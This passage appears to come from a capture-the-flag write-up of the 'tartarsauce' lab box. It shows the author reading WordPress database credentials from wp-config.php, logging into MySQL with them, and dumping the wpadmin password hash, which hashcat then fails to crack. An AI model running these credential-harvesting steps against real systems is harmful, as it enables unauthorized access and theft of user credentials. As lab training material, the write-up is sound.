DB
www-data@tartarsauce:/var/www/html/webservices/wp$ cat wp-config.php<?php
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wp');
/** MySQL database username */
define('DB_USER', 'wpuser');
/** MySQL database password */
define('DB_PASSWORD', 'w0rdpr3$$d@t@b@$3@cc3$$');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
[...REDACTED...]I saw a familiar socket while enumerating for networks, it’s mostly used for a MySQL service
and I got a credential for local DB from the configuration file; /var/www/html/webservices/wp/wp-config.php
wpuser:w0rdpr3$$d@t@b@$3@cc3$$
www-data@tartarsauce:/var/www/html/webservices/wp$ mysql -uwpuser -p
enter password: w0rdpr3$$d@t@b@$3@cc3$$Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 35
server version: 5.7.22-0ubuntu0.16.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
mysql> use wp;
use wp;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select user_login,user_pass from wp_users;
select user_login,user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass |
+------------+------------------------------------+
| wpadmin | $P$BBU0yjydBz9THONExe2kPEsvtjStGe1 |
+------------+------------------------------------+
1 row in set (0.00 sec)I got the web credential hash for the wpadmin user
Hashcat was unable to crack the password hash
Deadend.